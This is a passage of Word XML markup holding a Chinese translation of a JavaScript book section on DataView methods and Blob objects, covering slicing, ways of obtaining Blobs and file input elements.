        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>view.setInt32(8,int,false);//</w:t>
      </w:r>
      <w:r>
        <w:t>以高位优先顺序格式将数字写回去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DateView</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种不同的类型化数组分别定义了</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>方法。名字诸如：</w:t>
      </w:r>
      <w:r>
        <w:t>getInt16</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>getUint32()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>getFloat64()</w:t>
      </w:r>
      <w:r>
        <w:t>。这些方法的第一个参数指定了</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中的字节偏移量，表示从哪个值开始获取。除了</w:t>
      </w:r>
      <w:r>
        <w:t>getInt8()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>getUint8()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之外，其他所有</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法都接受第二个可选的布尔类型的参数。如果忽略该参数或者将该参数设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则表示采用高位优先字节顺序；反之，则采用低位优先字节顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DateView</w:t>
      </w:r>
      <w:r>
        <w:t>同时也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个对应的</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用于将值写入到那个基本缓存区</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中。这些方法的第一个参数指定偏移量，表示从哪个值</w:t>
      </w:r>
      <w:r>
        <w:t>开始写。第二个参数指定要写入的值。除了</w:t>
      </w:r>
      <w:r>
        <w:t>setInt8()</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>setUint8()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之外，其他每个方法都接受第三个可选的参数。如果忽略该参数或者将该参数设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则将值以高位优先字节顺序写入；反之，则采用低位优先字节顺序写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="22_6_Blob"/>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>是对大数据块的不透明引用或者句柄。名字来源于</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库，表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>二进制大对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Binary Large Object</w:t>
      </w:r>
      <w:r>
        <w:t>）。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>通常表示二进制数据，不过它们不一定非得是大量数据：</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>也可以表示一个小型文本文件的内容</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>是不透明的：能对它们进行直接操作的就只有获取它们的大小（以字节为单位）、</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型以及将它们分割成更小的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var blob=...//</w:t>
      </w:r>
      <w:r>
        <w:t>后面会介绍如何获取一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>blob.size//Blob</w:t>
      </w:r>
      <w:r>
        <w:t>大小（以字节为单位）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>blob.type//Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，如果未知的话，则是</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var subblob=blob.slice(0,1024,"text/plain");//Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中前</w:t>
      </w:r>
      <w:r>
        <w:t>1KB</w:t>
      </w:r>
      <w:r>
        <w:t>视为文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>last=blob.slice(blob.size-1024,1024);//Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中最后</w:t>
      </w:r>
      <w:r>
        <w:t>1KB</w:t>
      </w:r>
      <w:r>
        <w:t>视为无类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>存储到内存中或者磁盘上，</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>可以表示非常大的数据块（比如视频文件），如果事先不用</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将它们分割成为小数据块的话，无法存储在主内存中。正是因为</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>可以表示非常大的数据块，并且它可能需要磁盘的访问权限，所</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>以使用它们的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是异步的（在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中有提供相应的同步版本）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>本身并没有多大意思，但是它们为用于二进制数据的大量</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r>
        <w:t>提供重要的数据交换机制。图</w:t>
      </w:r>
      <w:r>
        <w:t>22-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何从</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>、本地文件系统、本地数据库或者其他的窗口和</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中对</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>进行读写。不仅如此，图</w:t>
      </w:r>
      <w:r>
        <w:t>22-2</w:t>
      </w:r>
      <w:r>
        <w:t>还展示了如何以文本、类型化数组或者</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的形式读取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4028535" cy="3579962"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="84" name="00084.jpeg" descr="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4.jpeg" descr="00084.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4028535" cy="3579962"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>22-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>以及使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>之前，首先必须要获取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。获取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>有很多方法，其中有些方法中涉及的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之前已经介绍过了，而有些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>则会在本章后续部分做相应的介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·Blob</w:t>
      </w:r>
      <w:r>
        <w:t>支持结构性复制算法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>），这就意味着，</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件从其他窗口或者线程中获取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以从客户端数据库中获取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，这部分会在</w:t>
      </w:r>
      <w:r>
        <w:t>22.8</w:t>
      </w:r>
      <w:r>
        <w:t>节进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>标准中的尖端特性，通过脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>中下载</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。这部分内容会在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>对象来从字符串、</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>对象（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及其他</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>来创建自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>对象将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>最后也是最重要的就是，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的子类：</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象其实就是有名字和修改日期的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>数据。通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素以及拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可以获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这部分将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节进行相应介绍。在</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中会介绍，</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象还可以使用文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来获取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦获取了</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以对其进行很多的操作，其中包括上述提到的一些操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法向其他窗口或者</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>发送一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>存储到客户端数据库中。</w:t>
      </w:r>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.8</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>传递给一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，来将该</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>上传到服务器。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-9</w:t>
      </w:r>
      <w:r>
        <w:t>介绍了相关的文件上传的例子（要记住，</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象就是特殊的类型的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>createObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>函数获取一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>blob://URL</w:t>
      </w:r>
      <w:r>
        <w:t>，该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>代表一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，然后，将其和</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>结合使用。</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节会对其进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象来异步地（或者在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中同步地）将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>内容抽取成一个字</w:t>
      </w:r>
      <w:r>
        <w:t>符串或者</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节将展示该基本的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍的文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter</w:t>
      </w:r>
      <w:r>
        <w:t>对象，来实现将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>写入到一个本地文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面几节将介绍如何简单地获取和使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。涉及本地文件系统和客户端数据库的更为复杂的技术将在它们各自的章节中做相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="22_6_1_Wen_Jian_Zuo_Wei_Blob"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>22.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文件作为</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r>
        <w:t>type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素最初是用于在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中实现文件上传的。浏览器总是很小心地实现该元素，目的是为了只允许上传用户显式选择的文件。脚本是无法将该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置成一个文件名的，这样它们就无法实现将用户电脑上任意的文件进行上传。最近，浏览器提供商已经对该元素进行了扩展，允许客户端可以访问用户选择的文件了。要注意的是，允许客户端脚本读取选择的文件内容不会引发安全问题，它和允许这些文件上传到服务器的安全级别是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在支持本地文件访问的浏览器中，＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上的</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>iles</w:t>
      </w:r>
      <w:r>
        <w:t>属性则是一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileList</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该对象是一个类数组对象，其元素要么是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，要么是用户选择的多个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
